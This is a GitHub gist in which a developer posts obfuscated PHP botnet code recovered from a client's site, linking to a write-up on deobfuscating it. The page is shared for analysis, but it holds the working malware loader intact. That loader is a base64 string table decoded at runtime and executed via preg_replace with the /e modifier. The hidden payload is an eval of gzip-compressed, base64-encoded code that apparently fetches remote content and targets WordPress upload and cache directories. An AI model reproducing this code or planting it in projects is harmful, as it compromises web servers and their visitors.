Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Found this botnet code in a client's codebase. This is the code the first obfuscated layer was executing. (Whitespace added for your convenience.) http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
<?php
/*versio:2.18*/
$III1=0;
if (!function_exists('IlI11lll')){
$GLOBALS['III1'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZEVsVVFibW0rMDB5Qkk3ZFEyeU5ucHpMSm00WXo0WkxxOHZ0YkpDMmxPdGtsYzVGV3lwVnBWN0tsK1RncGE3WXVNcUNiZzlOQjRlcURWSmttcEJqYmdMelRBV0RnTHcxQkhzNkVGbjhGc2tBYTJuYWFwNWhpa0IvZVpKVHNBaWRBeGE0MmhRZnFnTVVxeUpDcHBwZFVDdTI4UXg5SU5nZzlJSUE5TTVhRkZSU2UrNHRMRlExMkVDWUZhL2dnZmpEZWpPTThxbWxWbFk4SUYvN2FsRTVPSWdOZ25GcEhaMlBRZ2p5NDRxdk1qVEdObWFGcFNmSjdNVUVSL0ppVzRFREZqbVU0RHNHS25FUDVJbkdvaUtmQ2xMU2tEaDczcUhQMkVvVFZyVFp3bk1pZnNhTUtMUVM2VzgrdndaaEhCZndiNW41SGFsZ3RxanY2aDRhdkorUE5rYm14V0VQcUhpdlBKWWptZkx1Ymo2ZTBsWEJBOTlyNytSVGlkVGk0V2krRHZTYmhjR01SaktZQkh6bVlzZVR3YjhoNmFpdmRGR3NWcFhsTGxGTXRCdDd2cVdST1hvUWlObVNaV2UyQVF5UEtocVNyVGtWWEZGdUlRUU9lYk1vOS81RHVhTmEwL3NIajd3MWVERlJrTTgwZmpDeVI4ZUNlQ2x0WG1uQnpERTBMYTdQYXlmUkMvbmI4bUMvSWlLblU0ZTFvOSsvZ1NXcEdyeGVMbU45dTB2aFhmc3F1OHJINUhOZmEwQXg1MWVJL1pBUVBlemRWTkZONDI3V003TnVMRXhQTXZrL2x0RUU1YmZDOUxXbndhUHdCbTBEZzN4b3hMQjArUFNBWW5IL0NQaUU4bloyZEVlOFUzNUZNai9nTmUwMlRLeEl3RFpKWEgyTTZBVWRGb0krc3Q2WW4xQlNNZStuT1g1bXVxZGVvM0d0SWs2TzB6WkJpaGZXZmROM2hPdHUzM1FJLzV4RC9vRHN0aWhSb1h4ZXBab1NISFpkQlN3R2E3Y09TNFIwY2VBdEJEWk5WaytsUWtGV1ZOQ3Y4TUJuRkl4WXRzSDd3TDdDV2FqaXNwNU1lSkR0UkhHMkdJWDZrTm5hdTVRb21JcGZhZjd5c29PTTlJaUZ3T1dvQk1NRW5qeDF4NU94S1NxNXRDVWVtaWdjZTZTRncwV2Y0NnJFcHZDWDJBQ1JqcXZPMzVVR3VrRGtMSDdnbSs1MnczOHh1eEl3WUZ4NmlsU055QkdES1FJT2dsUmRMMTJIeEFHTUJaa0NxaVhnOGNEWmdJNkRnSUZOR2dGbkV3K2E4cHRKYVlmbGtWVlo3bVQ3VFFScWZSN1dRT1VMcHI5SzBlSTFOc3RFMWUwRlg4Q0hXTkVOQ3Jrb2hrK244MldjZTZnOGxkenRzZURwdDZ1d2pZUHRhYldiZ1QxKy85Rmo2VE0rbDlXeERKNEwvWk9zQ3J0Sk9rWk5CNUcyTFhaVjE5enlmdSszTEczMi9GUFp1TGtUSmJVNGhkRG0xeC95dnpwcm9DREJGOU9Pbytzc2l4SUprYTJOdVhaVzI3VmNmSmhnS2NCLzVvdS9ia01EQkZYNXFDWjBVejh0NkQxa3Y5ZFZKa0t5QytLTG9NcmlkUnBKdWZnemtNdTNEK0ZiemRqT2RqK0NpMmdpQ29XVWFOYWlnMm9wYjNkUjFBYUZlL2J4ZTZGa0tFQ3lmVEwrOWNPNWE0ckVWYUpkS2FDSzJoZ3k0dVNsMjlWUUw5NUxTTGtGd2NCK042cytGNURFRkRYU1ZTai9zM3lCR3FSTm9RVjdnSHdGemdjRG9SaTRBNGxOdFlhcHQrYS83NXBsbEd5S2lyN3lrOXZzbWVqdHNZUHp3bjM4SC9qM3BDVk51ZC95WStqMitrcG1nYjRhS3VVZ2ZIZVBRMUdpOFhWNTE3M3hkcWtvTWxvNDRFVnl0bVdZRU15WWlLUTQrUGRrR2lxcUNQbWF2M2s1UU5HRUdPYmVqekdFMGkrbkRLMEg5V3Fid0ZObjd4UEp3TTNhTzZJZis3T3B0QnNDTlhtc1UreW9Uelh4V1FRZWFyeXZmeEkvL0tmaHpFNlg1Tm96eUxxVHprTE1kWE5BVHZDRFpCbXNVNHhjV1JKR3EyUDQ4K3BtcHZ5R2ZGRVZYTGJhTFc2dGtJUVRXb0hzNStENlo2M1htMi9ZckkrUk9NV25yaSs1ZHNjK1pxYXFqOFJ4UU9lblZWN1BVQk8zYVhUMWt3MGhTME4reGlrbVZyTllLK3hSYW1saDdvMitJSzd4bzJBQU5PT00xUE83Ym93SUxVL0xvN2YxV1N3M0hudzkrL2t4VVhuQT09IikpKTs(cHJlZ19yZXBsYWNlu&';
function IlI11lll($a, $b){
$c=$GLOBALS['III1'];
$d=pack('H*','626173'.'6536345f6465636f6465');
return $d(substr($c, $a, $b));
};
$Q00Q0QOQQ = IlI11lll(3285, 16);
$Q00Q0QOQQ("/QO0QOO0OO/e", IlI11lll(721, 2563), "QO0QOO0OO");
};?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment